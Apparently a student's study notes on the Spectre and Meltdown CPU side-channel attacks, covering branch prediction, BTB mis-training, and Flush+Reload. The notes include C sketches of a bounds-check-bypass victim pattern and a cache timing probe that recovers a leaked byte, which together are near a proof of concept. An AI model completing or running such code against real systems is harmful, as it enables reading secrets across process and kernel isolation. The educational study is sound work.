-Spectre notes-

"Spectre attacks involve inducing a victim to speculatively perform operations that would not occur during correct program execution and which leak the victim's confidential information via a side channel to the adversary."

Meltdown vs. Spectre:
- Meltdown is the more easily exploited (and more easily patched) of the two
- Meltdown relies on a flaw (mostly in Intel CPUs) where the permission check on a load happens only after the data has already been used speculatively, letting user space read kernel memory
- Spectre differs in that it doesn't depend on that delayed permission check; it mis-trains branch prediction so that the victim's own code speculatively leaks its data

Modern processors use speculative execution to maximize performance. (E.g., if a branch's outcome depends on a memory value that is still being read, the CPU guesses the outcome and keeps executing rather than stalling.)

Two forms of speculation that we'll use:

- branch prediction:
      void something(int a) {
          if (a > 0) doa();
          else dob();
      }
  your CPU maintains branch history:
  - stored in a structure called the branch history buffer ("BHB")
  - this kind of branch is a "direct branch"
  - predicting it is one form of speculative execution

- branch-target prediction:
  - an indirect jump goes to an address computed at runtime, e.g. jump to the location stored at the address in eax:
      jmp [eax]
  - btb.c example (see the indirect-call sketch after these notes)
  your CPU maintains branch-target history:
  - stored in a structure called the branch-target buffer ("BTB")
  - this kind of branch is an "indirect branch"
  - IMPORTANT NOTE: the BTB is shared by code running on the same core, so one program can mis-train it and mess with another program's predictions

Spectre attacks are basically done in 3 steps:
- locate a sequence of instructions in the victim's address space which, when executed, leaks the victim's memory or register contents over a covert channel
  - covert channel: a channel that transfers information between processes that are not supposed to be able to communicate
- trick the CPU into speculatively executing this instruction sequence
- attacker retrieves the info over the covert channel

In practice it can be tricky, because you need to:
- induce erroneous speculative execution
- have a microarchitectural covert channel

One simple example of inserting data into the covert channel -- exploiting conditional branches (a compilable sketch of this victim/attacker pattern also appears after these notes):

    // x is a user-controlled variable
    if (x < array1_size)
        y = array2[array1[x] * 256];

If we supply an out-of-bounds x after training the branch predictor to expect "x < array1_size", the CPU still speculatively reads array1[x] (a secret byte) and then array2[array1[x] * 256], loading that line into the cache. The attacker then figures out which line was loaded, and that reveals the byte. (Figure it out with a side channel, e.g. a timing attack: time loads of array2, one cache-line-sized step at a time. If memory at array2+2560 reads very fast, then array2[10*256] was cached, and thus array1[x] = 10. If we chose x so that array1+x points into kernel memory, we have just extracted a byte of kernel memory!!)

Another way doesn't even require the victim program to contain the vulnerable branch:
- gadget: a machine-code snippet already present in the victim's code
- Branch Target Buffer: maps recently executed indirect branch instructions to where they jumped
- attacker:
  - finds the virtual address of a useful gadget
  - trains the BTB so an indirect branch mispredicts to that gadget
  - when the victim takes the indirect jump, the CPU speculatively jumps to the gadget and executes it

One way to read essentially all of the victim's memory by exploiting the BTB -- assume the following (fairly common) situation:
- at the time of an indirect branch, two registers R1, R2 hold values derived from the attacker's input
- there is a gadget in the victim's code that adds R1 to R2 and then loads from the address in R2 (assume the two instructions are adjacent for simplicity)
- mis-train the BTB so the indirect branch mispredicts into the gadget: it computes R2 = R1 + R2 and loads from that attacker-chosen address, and the load's cache footprint leaks the value
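Not having btb.c at hand, here is a minimal C sketch of the kind of indirect branch it presumably demonstrates; the handler/dispatch names and the training loop are made up for illustration. A call through a function pointer compiles to an indirect call (same family as jmp [eax]), and the CPU predicts its target with the BTB.

    #include <stdio.h>

    static volatile int counter;

    void handler_a(void) { counter += 1; }
    void handler_b(void) { counter += 2; }

    /* The call through fn is an indirect call whose target the CPU
     * predicts using the Branch Target Buffer (BTB). Repeated calls to
     * the same target "train" the BTB; because the BTB is shared, an
     * attacker on the same core can train it toward a target of their
     * choosing so the victim speculatively executes the wrong code.
     * (At higher optimization levels the compiler may turn these calls
     * into direct calls; compile with -O0 to keep them indirect.) */
    void dispatch(void (*fn)(void)) {
        fn();
    }

    int main(void) {
        for (int i = 0; i < 1000; i++)
            dispatch(handler_a);   /* trains the BTB toward handler_a */
        dispatch(handler_b);       /* likely mispredicted: the CPU briefly
                                      speculates into handler_a, then squashes */
        printf("%d\n", counter);
        return 0;
    }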
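And a compilable sketch of the conditional-branch (bounds-check bypass) pattern above. The array names and the *256 stride follow the snippet in the notes; the array sizes, training loop, and malicious_x value are illustrative assumptions, not a working exploit.

    #include <stdint.h>
    #include <stddef.h>

    size_t  array1_size = 16;
    uint8_t array1[16];
    uint8_t array2[256 * 256];   /* one 256-byte region per possible byte value */

    void victim(size_t x) {
        /* Architecturally, an out-of-range x reads nothing. But if the
         * branch predictor has been trained to expect "x < array1_size",
         * the CPU speculatively runs the body even for a malicious x,
         * touching array2[array1[x] * 256] and leaving that cache line
         * resident -- a footprint that encodes the secret byte array1[x]. */
        if (x < array1_size)
            (void)*(volatile uint8_t *)&array2[array1[x] * 256];
    }

    int main(void) {
        /* 1. Train the branch "taken" with in-bounds indices. */
        for (size_t i = 0; i < 100; i++)
            victim(i % array1_size);

        /* 2. Attacker would flush array2 from the cache here
         *    (see the timing-probe sketch after the references). */

        /* 3. One call with x chosen so array1 + x points at a secret
         *    byte outside array1; 10000 is just a placeholder offset. */
        victim(10000);

        /* 4. Attacker then times loads of array2[i * 256] for i = 0..255;
         *    the fast index is the secret byte. */
        return 0;
    }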
Leak info through:
- the BTB, via indirect branching -- e.g. mis-training the BTB so the CPU speculatively jumps to the wrong instruction
- branch history -- e.g. mis-training the if/else branch history so the CPU speculates down the wrong path

Two simple techniques for extracting data from the cache covert channel: Flush+Reload and Evict+Reload (a minimal timing-probe sketch follows the references below).
- Flush+Reload: the attacker uses clflush to evict a shared cache line, lets the victim run, then reloads the line and times it -- a fast reload means the victim (possibly only speculatively) touched it.
- Evict+Reload: same idea, but the attacker evicts the line by filling its cache set with other memory accesses instead of using clflush.

Breaks security mechanisms like:
- OS process isolation (processes reading each other's memory)
- static analysis (guarantees established by analyzing the code don't hold on speculated paths)
- containerization (programs reaching data outside their container)
- other countermeasures against cache timing / side-channel attacks

Important mentions:
- Spectre can be exploited using JavaScript: a proof-of-concept was created which allows JS running in a browser to read the browser's memory.
- Return-Oriented Programming (ROP) is a related technique that chains together gadgets already present in the victim's own code, typically by overwriting return addresses via a buffer overflow; Spectre borrows the gadget idea but triggers gadgets speculatively.

Conclusion:
- Many of these attacks are very hard to protect against.
- They will likely require a significant redesign of CPUs.
- Hardware and software developers will need to work together to define what information CPUs are and aren't allowed to leak.

Affected hardware: Intel, AMD, and ARM-based processors (e.g. Samsung/Qualcomm).

--- references ---
research:
https://meltdownattack.com/meltdown.pdf
https://spectreattack.com/spectre.pdf
probe function (takes a memory address, times an access to it, sees how long it takes):
https://github.com/defuse/flush-reload-attacks/blob/master/flush-reload/myversion/attacktools.h
and explanation (page 5): https://eprint.iacr.org/2013/448.pdf
vague video explanations of Meltdown:
https://www.youtube.com/watch?v=I5mRwzVvFGE
https://www.youtube.com/watch?v=tdmGFiILNcY
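Flush+Reload timing-probe sketch (C, x86, GCC/Clang intrinsics). This is my own minimal version under assumed names and thresholds, not the code from the linked attacktools.h: flush() evicts a line, reload_time() times a load, and recover_byte() scans the probe array for the fast line.

    #include <stdint.h>
    #include <stddef.h>
    #include <x86intrin.h>   /* _mm_clflush, _mm_mfence, __rdtscp (GCC/Clang on x86) */

    /* Flush step: evict the cache line holding *addr. */
    static inline void flush(const void *addr) {
        _mm_clflush(addr);
        _mm_mfence();
    }

    /* Reload step: time one load of *addr in cycles. A result below a
     * machine-specific threshold (must be calibrated per machine) means
     * the line was already cached, i.e. someone -- possibly a
     * speculatively executing victim -- touched it since the flush. */
    static inline uint64_t reload_time(const void *addr) {
        unsigned int aux;
        uint64_t start = __rdtscp(&aux);
        (void)*(volatile const uint8_t *)addr;
        uint64_t end = __rdtscp(&aux);
        return end - start;
    }

    /* Recover one leaked byte: after the victim has run, find the index i
     * whose line probe_array[i * stride] reloads fast. stride mirrors the
     * 256 in the victim snippet above. */
    int recover_byte(const uint8_t *probe_array, size_t stride,
                     uint64_t threshold) {
        for (int i = 0; i < 256; i++)
            if (reload_time(&probe_array[i * stride]) < threshold)
                return i;
        return -1;
    }

Usage follows the numbered steps in the victim sketch: flush all 256 lines of array2, trigger victim(malicious_x), then call recover_byte(array2, 256, threshold) to read out one secret byte.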